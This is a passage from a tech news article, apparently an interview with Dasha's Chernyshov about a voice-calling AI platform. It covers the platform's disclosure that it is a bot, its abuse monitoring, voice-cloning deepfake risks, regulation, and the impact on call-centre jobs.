Although if you straight out ask Dasha whether it’s a robot Chernyshov says it has been programmed to confess to being artificial. So it won’t tell you a barefaced lie.

Dasha

How will the team prevent problematic uses of such a powerful technology?

“We have an ethics framework and when we will be releasing the platform we will implement a real-time monitoring system that will monitor potential abuse or scams, and also it will ensure people are not being called too often,” he says. “This is very important. That we understand that this kind of technology can be potentially probably dangerous.”

“At the first stage we are not going to release it to all the public. We are going to release it in a closed alpha or beta. And we will be curating the companies that are going in to explore all the possible problems and prevent them from being massive problems,” he adds. “Our machine learning team are developing those algorithms for detecting abuse, spam and other use cases that we would like to prevent.”

There’s also the issue of verbal ‘deepfakes’ to consider. Especially as Chernyshov suggests the platform will, in time, support cloning a voiceprint for use in the conversation — opening the door to making fake calls in someone else’s voice. Which sounds like a dream come true for scammers of all stripes. Or a way to really supercharge your top performing salesperson.

Safe to say, the counter technologies — and thoughtful regulation — are going to be very important.

There’s little doubt that AI will be regulated. In Europe policymakers have tasked themselves with coming up with a framework for ethical AI. And in the coming years policymakers in many countries will be trying to figure out how to put guardrails on a technology class that, in the consumer sphere, has already demonstrated its wrecking-ball potential — with the automated acceleration of spam, misinformation and political disinformation on social media platforms.

“We have to understand that at some point this kind of technologies will be definitely regulated by the state all over the world. And we as a platform we must comply with all of these requirements,” agrees Chernyshov, suggesting machine learning will also be able to identify whether a speaker is human or not — and that an official caller status could be baked into a telephony protocol so people aren’t left in the dark on the ‘bot or not’ question. 

“It should be human-friendly. Don’t be evil, right?”

Asked whether he considers what will happen to the people working in call centers whose jobs will be disrupted by AI, Chernyshov is quick with the stock answer — that new technologies create jobs too, saying that’s been true right throughout human history. Though he concedes there may be a lag — while the old world catches up to the new.

Time and tide wait for no human, even when the change sounds increasingly like we do.